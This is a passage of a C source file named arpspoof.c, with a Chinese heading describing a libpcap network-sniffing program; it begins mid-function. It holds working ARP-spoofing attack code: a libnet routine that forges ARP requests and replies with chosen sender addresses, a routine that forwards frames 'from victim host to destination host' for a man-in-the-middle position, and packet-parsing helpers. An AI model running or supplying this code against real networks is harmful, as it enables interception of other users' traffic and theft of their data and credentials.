arpspoof.c

利用libpcap实现一个网络监听的程序

 for( i=0 ;i<6;i++)
{
local_mac[i]= (unsigned char) buf[intrface].ifr_hwaddr. sa_data[i];
}
                                                                                                               
                                                             }
  else {
            char str[256];
            sprintf(str, "cpm: ioctl device %s",
             buf[intrface].ifr_name);
            perror(str);
        }
                                                                                                               
                                     }
                                               }
      else
        perror("cpm: ioctl");
                                                                                                               
    }
 else
    perror("cpm: socket");
                                                                                                               
    close(fd);
    return retn;
                                                                                                               
                                                                                                               
}


 //send an arp request or reply packeta
int arpsend(char*device,u_char*arp_spa,u_char*arp_sha,u_char*arp_tpa,u_char * arp_tha,u_char*dst,u_short op)
{
 libnet_t *l;
 libnet_ptag_t t;
 u_char *packet;
 u_long packet_s;

 char errbuf[LIBNET_ERRBUF_SIZE];
 l = libnet_init(LIBNET_LINK_ADV,device,errbuf);
    if (l == NULL){
        fprintf(stderr, "libnet_init() failed: %s", errbuf);
        return -1;
                  }
 t = libnet_build_arp(
            ARPHRD_ETHER,                           /* hardware addr */
            ETHERTYPE_IP,                           /* protocol addr */
            6,                                      /* hardware addr size */
            4,                                      /* protocol addr size */
            op,                            /* operation type */
            arp_sha,                               /* sender hardware addr */
            arp_spa,                           /* sender protocol addr */
            arp_tha,                               /* target hardware addr */
            arp_tpa,                           /* target protocol addr */
            NULL,                                   /* payload */
            0,                                      /* payload size */
            l,                                      /* libnet handle */
            0);                                     /* libnet id */
    if (t == -1){
        fprintf(stderr, "Can't build ARP header: %s\n", libnet_geterror(l));
        return -1;
                }

t = libnet_autobuild_ethernet(
                   dst,
                 ETHERTYPE_ARP,                          /* protocol type */
                            l);                           /* libnet handle */
    if (t == -1){
     fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
     return -1;
                }
  t = libnet_adv_cull_packet(l, &packet, &packet_s);
    if (t== -1){
        fprintf(stderr, "libnet_adv_cull_packet: %s\n", libnet_geterror(l));
        return -1;
               }
  t = libnet_write(l);
    if (t== -1){
        fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
        return -1;
                }
          
libnet_destroy(l);

return 1;


}
//foward a packet from victim host to destnation host
int forward_packet(char * device,u_char * src_mac,u_char * dst_mac,u_char * packet)
{
 libnet_t *l;
 libnet_ptag_t t;

 u_long packet_s;
 char errbuf[LIBNET_ERRBUF_SIZE];

                                                                                                               
                                                                                        
 struct ip *iph;
iph=(struct ip *)(packet+ETHER_HDR_LEN);

                                                                                                              
 
l = libnet_init(LIBNET_LINK,device,errbuf);
    if (l == NULL){
        fprintf(stderr, "libnet_init() failed: %s", errbuf);
        return -1;
                  }


                                                                                                               
                                                                                                               
t= libnet_build_ethernet(dst_mac, src_mac, ETHERTYPE_IP,(u_char*)iph,ntohs(iph->ip_len), l, 0);
 if (t== -1){
        fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
         return -1;                                                                                                            }
                                                                                                               
t= libnet_write(l);
    if (t == -1){
        fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
         return -1;                                                                                                            }
                                                                                                               
  libnet_destroy(l);
  return 1;



}



//get source ip address of a arp packet
u_char * get_spa(u_char * p)
{
 struct ether_header * eth;
 struct ether_arp * arp;
 eth=(struct ether_header *)p;
 arp=(struct ether_arp *)(p+sizeof(struct ether_header ));
 return arp->arp_spa;
                                                                                                               
}
//get dst ip address of a arp packet
u_char * get_tpa(u_char * p)
{
 struct ether_header * eth;
 struct ether_arp * arp;
 eth=(struct ether_header *)p;
 arp=(struct ether_arp *)(p+sizeof(struct ether_header ));
 return arp->arp_tpa;
                                                                                                               
}

//get type of an arp packet
int get_arp_op(u_char * p)
{
struct ether_arp * arp;
arp=(struct ether_arp *)(p+sizeof(struct ether_header ));
int op=ntohs((arp->ea_hdr).ar_op);
return op;
}
                                                                                                               
//get source mac adddress of an arp packet
u_char * get_sha (u_char * p)
{
struct ether_arp * arp;
arp=(struct ether_arp *)(p+sizeof(struct ether_header ));
return arp->arp_sha;
                                                                                                               
}
//weather  two ip  address same                                                                                                              
int test_ip(u_char * ip1,u_char * ip2)
{
if(ip1[0]==ip2[0]&&ip1[1]==ip2[1]&&ip1[2]==ip2[2]&&ip1[3]==ip2[3])
      return 1;
else
      return 0;
                                                                                                               
}
//weather two mac address same

int test_mac(u_char * mac1,u_char * mac2)
{

if(mac1[0]==mac2[0]&&mac1[1]==mac2[1]&&mac1[2]==mac2[2]&&mac1[3]==mac2[3]&&mac1[4]==mac2[4]&&mac1[5]==mac2[5])
      return 1;
else
      return 0;




}

//get destination host mac address
int get_dst_mac(pcap_t* pt,struct pcap_pkthdr *hd)
{          
       u_char * packet;
       int i;
             while(1){
            packet=pcap_next(pt, hd);
       if(packet==NULL||test_ip(get_spa(packet),dst_ip)==0||get_arp_op(packet)!=2)
             {
                  continue;
             }
          u_char * dst=get_sha(packet);
          for(i=0;i<6;i++)
          dst_mac[i]=dst[i];                                                                                           return 1;
                                                                                           
                       }


}                                                                                                            
//get ethernet  frame type


int  get_ether_type(u_char *p)
     {
     struct ether_header * eth;
     eth=(struct ether_header* )p;
     int type=ntohs(eth->ether_type);
     return type;
    }

//get dst ip address of a ip packet
u_char * get_ipdst(u_char * p)
     {
    struct ip *iph;
   iph=(struct ip *)(p+ETHER_HDR_LEN);
    u_char * temp;   
   temp=(u_char *)&(iph->ip_dst);
   return temp;                                                                                                     }
//get ethernet src mac address
  u_char * get_ether_shost(u_char * p)
{
struct ether_header * eth;
eth=(struct ether_header* )p;
return eth->ether_shost;



}

 u_char * get_ether_dhost(u_char * p)
{
struct ether_header * eth;
eth=(struct ether_header* )p;
return eth->ether_dhost;
                                                                                                               
                                                                                                               
                                                                                                               
}